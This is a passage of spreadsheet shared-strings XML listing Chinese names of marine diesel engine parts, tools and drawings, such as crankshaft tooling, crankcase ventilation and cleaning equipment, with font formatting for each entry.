      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端板，油底壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端保护板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端端盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端盖上的操作盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端盖上的端盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端链条安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端扫气箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端箱，精加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端箱毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端箱油温计的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端止动件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端轴安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端主轴承座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前后端力矩补偿装置布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前后端平衡布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前进</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后退指示器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前伺服油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前置环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>桥规</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>桥规部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>桥楼控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>桥楼控制设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>桥楼控制要求</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>桥式导向阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>桥式整流</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切板方案</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板列表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切断用轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切割方案</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切口滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>青铜板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>青铜制滑动轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>倾斜吊装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>倾斜座圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁单元保护套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁电线</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁盖总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁工具，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>NC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁工具，开关阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁柜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁用蒸汽管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁油图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁装置的外形</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清漆，防锈漆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清扫刷</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗，柴油机，船厂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗工具布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗液</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球柄螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球式螺帽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球窝接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球形垫</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球形联接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球形座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动齿轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-Y56F</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动装置保护套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动装置导销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动装置连接环节</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄喷砂清理生产规格书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱放气布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱滑油分离器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱滑油监测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱内平台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱通风</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱油出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴瓦吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴瓦吊具试验规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Bearing shell for bottom end bearing (Upper half) </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(Upper half</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>？）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄轴承上部毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄轴颈分列</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄轴瓦下部毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄轴瓦总成毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲线配合器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲线图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴，推力轴承工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴，推力轴工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴工具板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴，推力轴及推力机构</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴，液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴，预加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴材料清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴齿轮齿圈（凸轮轴驱动）</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴吊具</t>
    </r>
